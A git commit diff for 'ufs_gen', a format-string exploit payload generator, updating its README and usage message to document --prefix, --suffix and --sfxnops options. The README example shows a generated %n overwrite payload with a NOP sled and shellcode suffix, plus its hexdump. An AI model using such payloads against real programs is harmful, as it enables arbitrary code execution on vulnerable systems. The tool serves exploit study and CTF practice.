diff options
| author | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 12:43:44 +0000 |
|---|---|---|
| committer | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 12:43:44 +0000 |
| commit | 9aa9983fb7e737d2fa7d1c61b1f26411dbd04407 (patch) | |
| tree | 68a57cd561cf3fe0e0d8faf417c2276e14836f32 | |
| parent | a9f072448d2ffd9f1f275367533945e7a92237a3 (diff) | |
update the usage message and the README
Refs: #1
| -rw-r--r-- | README | 20 | ||||
| -rw-r--r-- | main.c | 9 |
2 files changed, 27 insertions, 2 deletions
@@ -38,12 +38,32 @@ is not 4 bytes long, there is very few chances that it would work correctly. The support of printf(payload) directly (i.e. without a temporary buffer) is also planned. +We support the option --prefix and --suffix which respectively prepend and +append their argument to the payload. + +We also support the option --sfxnops which adds n NOP byte (0x90) between the +payload and the suffix + Example ======= user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n +user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')" +user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C +NOP bytes are at offset 52 (0x34) +suffix is at offset 152 (0x98) +00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".| +00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5| +00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x| +00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............| +00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| +* +00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D| +0000009f + + License ======= @@ -50,8 +50,13 @@ static int suffix_nops_g = 0; __attribute__((noreturn)) static void usage(const char *arg0) { - fprintf(stderr, "usage: %s --override addr --with addr --stackidx idx\n", arg0); - fprintf(stderr, " %s --override addr --with addr --stackidx idx --addrsize size\n", arg0); + (void)arg0; + + fputs("usage:\n\n", stderr); + fputs( + "ufs_gen " + "[--prefix pfx] [--suffix sfx] [--sfxnops n]\n" + " --override addr --with addr --stackidx idx\n", stderr); exit(EX_USAGE); } |